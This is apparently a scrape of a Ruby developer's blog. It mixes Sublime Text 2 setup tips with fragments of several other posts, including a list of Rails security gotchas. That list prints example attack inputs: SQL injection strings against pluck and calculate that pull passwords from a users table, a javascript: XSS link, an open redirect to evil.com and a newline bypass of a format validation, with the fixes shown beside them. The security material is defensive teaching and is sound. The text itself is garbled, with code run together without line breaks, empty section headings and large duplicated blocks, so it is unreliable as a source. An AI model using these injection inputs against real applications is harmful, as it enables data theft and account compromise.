Start with a basic Settings file. You can use mine, which will activate the Soda Light theme. Reboot Sublime Text 2 so the Soda theme applies correctly. You can browse the default settings that ship with ST2 by choosing “Sublime Text 2” > “Preferences…” > “Settings – Default” to learn what you can configure.
Install more packages. My essentials are SCSS, RSpec, DetectSyntax and Git. DetectSyntax solves the problem of ensuring your RSpec, Rails and regular Ruby files open in the right mode.
Install CTags. CTags let you quickly navigate to code definitons (classes, methods, etc.). First: $ brew install ctags
Then use Package Control to install the ST2 package. Check out the default CTags key bindings to see what you can do.

Leveling Up with Custom Commands

Sublime Text 2 makes it dead simple to write your own commands and key bindings in Python. Here are some custom bindings that I use:

Copy the path of the current file to the clipboard. Source
Close all tabs except the current one (reduces “tab sprawl”). Source
Switch between test files and class definitions (much faster than TextMate). Source
Compile CoffeeScript to JavaScript and display in a new buffer. Source

New key bindings are installed by dropping Python class files in ~/Library/Application Support/Sublime Text 2/Packages/User and then binding them from Default (OSX).sublime-keymap in the same directory. The ST2 Unofficial Documentation has more details.

Neil Sarkar, my colleague, wrote most of the code for all of the above within a few weeks of switching to ST2.

Running RSpec from Sublime Text 2

This is my favorite part of my Sublime Text 2 config. I’ll admit: Out of the box (even with the RSpec package installed), ST2 sucks for running tests. Fortunately, Neil wrote a Python script that makes running RSpec from Sublime Text 2 much better than running it from TextMate via the RSpec bundle.

With this script installed, you can bind ⌘R to run the current file and ⌘⇧R to run the current test. The tests will run in Terminal. This is great for a number of reasons:

You can use any RSpec formatter and get nice, colored output.
Adding calls to debugger or binding.pry works. No need to change how you run your tests when you want to debug.
Window management. It’s smart enough to reuse the Terminal window for new test runs if you don’t close it. I put my Terminal window on the right 40% of my monitor.

This has really improved my TDD workflow when working on individual classes.

More Resources

Be sure to check out Brandon Keeper’s post on getting started with ST2.
This article on NetTuts has some good tips. (Although it’s a little out of date.)
My entire ST2 user directory is on GitHub, as is Neil’s.
You can search for ST2 packages here. Don’t be afraid to dive into their source – it’s usually quite approachable.

If you’ve tried Sublime Text 2, what did you think? What packages, key bindings, etc. are your favorites? What do you miss most from other editors?

Deciphering Ruby Code Metrics

Lines of Code

Complexity

Duplication

Test Coverage

Churn

Wrapping Up

Testing Code in a Rails Initializer

Configuring Asset Hosts

Rails' Insecure Defaults

13 Security Gotchas You Should Know About

Rails 3 Issues

1. CSRF via Leaky #match Routes

WebStore::Application.routes.draw do # Sample of named route: match 'products/:id/purchase' => 'catalog#purchase', :as => :purchase # This route can be invoked with # purchase_url(:id => product.id)end

def verified_request? !protect_against_forgery? || request.get? || form_authenticity_token == params[request_forgery_protection_token] || form_authenticity_token == request.headers['X-CSRF-Token']end

2. Regular Expression Anchors in Format Validations

validates_format_of :name, with: /^[a-z ]+$/i

>> /^[a-z ]+$/i =~ "Joe User"=> 0 # Match>> /^[a-z ]+$/i =~ " '); -- foo"=> nil # No match>> /^[a-z ]+$/i =~ "a\n '); -- foo"=> 0 # Match

validates_format_of :name, with: /\A[a-z ]+\z/i

3. Clickjacking

X-Frame-Options: SAMEORIGIN

4. User-Readable Sessions

session_cookie = <<-STR.strip.gsub(/\n/, '')BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTkwYThmZmQ3ZmdAY7AEZJIgtzZWtyaXQGO…--4c50026d340abf222…STRMarshal.load(Base64.decode64(session_cookie.split("--")[0]))# => {# "session_id" => "90a8f...",# "_csrf_token" => "iUoXA...",# "secret" => "sekrit"# }

Unresolved Issues

1. Verbose Server Headers

HTTP/1.1 200 OK# …Server: WEBrick/1.3.1 (Ruby/1.9.3/2012-04-20)

"WEBrick/#{WEBrick::VERSION} " +"(Ruby/#{RUBY_VERSION}/#{RUBY_RELEASE_DATE})",

2. Binding to 0.0.0.0

$ ./script/rails server -e production=> Booting WEBrick=> Rails 3.2.12 application starting in production on http://0.0.0.0:3000

3. Versioned Secret Tokens

WebStore::Application.config.secret_token = '4f06a7a…72489780f'

4. Logging Values in SQL Statements

5. Offsite Redirects

class SignupsController < ApplicationController def create # ... if params[:destination].present? redirect_to params[:destination] else redirect_to dashboard_path end endend

https://example.com/sessions/new?destination=http://evil.com/

redirect_to params.merge(only_path: true)

redirect_to URI.parse(params[:destination]).path

6. Cross Site Scripting (XSS) Via link_to

<%= link_to "Homepage", user.homepage_url %>

user.homepage_url = "javascript:alert('hello')"

<a href="javascript:alert('hello')">Homepage</a>

7. SQL Injection

Order.pluck(params[:column])

params[:column] = "password FROM users--"Order.pluck(params[:column])

SELECT password FROM users-- FROM "orders"

params[:column] = "age) FROM users WHERE name = 'Bob'; --"Order.calculate(:sum, params[:column])

SELECT SUM(age) FROM users WHERE name = 'Bob'; --) AS sum_id FROM "orders"

8. YAML Deserialization

class User < ActiveRecord::Base # ... serialize :preferences store :theme, accessors: [ :color, :bgcolor ]end

class User < ActiveRecord::Base serialize :preferences, JSON store :theme, accessors: [ :color, :bgcolor ], coder: JSONend

9. Mass Assignment

params = { user: { admin: true }.to_json }# => {:user=>"{\"admin\":true}"}@user = User.new(JSON.parse(params[:user]))

Rails' Remote Code Execution Vulnerability Explained

Vulnerability Summary

Proof of Concept

How It Works

Assessment

Mitigation

External Links

DCI, Concerns and Readable Code

Your Objects, the Unix Way

Applying the Unix Philosophy to Object-Oriented Design

Everything But the Kitchen Sink

Applying the Unix Philosophy

require "set"class UserContentSpamChecker TRIGGER_KEYWORDS = %w(viagra acne adult loans xrated).to_set def initialize(content) @content = content end def spam? flagged_words.present? end private def flagged_words TRIGGER_KEYWORDS & @content.split endend

class Tweeter def post(content) client.update(content) end private def client @client ||= Twitter::Client.new(Configuration.twitter_options) endend

Wrapping Up

Why Ruby Class Methods Resist Refactoring

Objections

YAGNI (You Aren’t Going To Need It)

It Uses an Extra Object

It’s Cumbersome to Call

Wrapping Up

7 Patterns to Refactor Fat ActiveRecord Models

Don’t Extract Mixins from Fat Models

1. Extract Value Objects

2. Extract Service Objects

3. Extract Form Objects

4. Extract Query Objects

5. Introduce View Objects

`WebStore::Application.routes.draw do # Sample of named route: match 'products/:id/purchase' => 'catalog#purchase', :as => :purchase # This route can be invoked with # purchase_url(:id => product.id) end`

`def verified_request? !protect_against_forgery? || request.get? || form_authenticity_token == params[request_forgery_protection_token] || form_authenticity_token == request.headers['X-CSRF-Token'] end`

`validates_format_of :name, with: /^[a-z ]+$/i`

`>> /^[a-z ]+$/i =~ "Joe User" => 0 # Match >> /^[a-z ]+$/i =~ " '); -- foo" => nil # No match >> /^[a-z ]+$/i =~ "a\n '); -- foo" => 0 # Match`

`validates_format_of :name, with: /\A[a-z ]+\z/i`

`X-Frame-Options: SAMEORIGIN`

1. Verbose `Server` Headers

`HTTP/1.1 200 OK # … Server: WEBrick/1.3.1 (Ruby/1.9.3/2012-04-20)`

`"WEBrick/#{WEBrick::VERSION} " + "(Ruby/#{RUBY_VERSION}/#{RUBY_RELEASE_DATE})",`

`$ ./script/rails server -e production => Booting WEBrick => Rails 3.2.12 application starting in production on http://0.0.0.0:3000`

`WebStore::Application.config.secret_token = '4f06a7a…72489780f'`

`class SignupsController < ApplicationController def create # ... if params[:destination].present? redirect_to params[:destination] else redirect_to dashboard_path end end end`

`https://example.com/sessions/new?destination=http://evil.com/`

`redirect_to params.merge(only_path: true)`

`redirect_to URI.parse(params[:destination]).path`

6. Cross Site Scripting (XSS) Via `link_to`

`<%= link_to "Homepage", user.homepage_url %>`

`user.homepage_url = "javascript:alert('hello')"`

`<a href="javascript:alert('hello')">Homepage</a>`

`Order.pluck(params[:column])`

`params[:column] = "password FROM users--" Order.pluck(params[:column])`

`SELECT password FROM users-- FROM "orders"`

`params[:column] = "age) FROM users WHERE name = 'Bob'; --" Order.calculate(:sum, params[:column])`

`SELECT SUM(age) FROM users WHERE name = 'Bob'; --) AS sum_id FROM "orders"`

`class User < ActiveRecord::Base # ... serialize :preferences store :theme, accessors: [ :color, :bgcolor ] end`

`class User < ActiveRecord::Base serialize :preferences, JSON store :theme, accessors: [ :color, :bgcolor ], coder: JSON end`

`params = { user: { admin: true }.to_json } # => {:user=>"{\"admin\":true}"} @user = User.new(JSON.parse(params[:user]))`

`require "set" class UserContentSpamChecker TRIGGER_KEYWORDS = %w(viagra acne adult loans xrated).to_set def initialize(content) @content = content end def spam? flagged_words.present? end private def flagged_words TRIGGER_KEYWORDS & @content.split end end`

`class Tweeter def post(content) client.update(content) end private def client @client ||= Twitter::Client.new(Configuration.twitter_options) end end`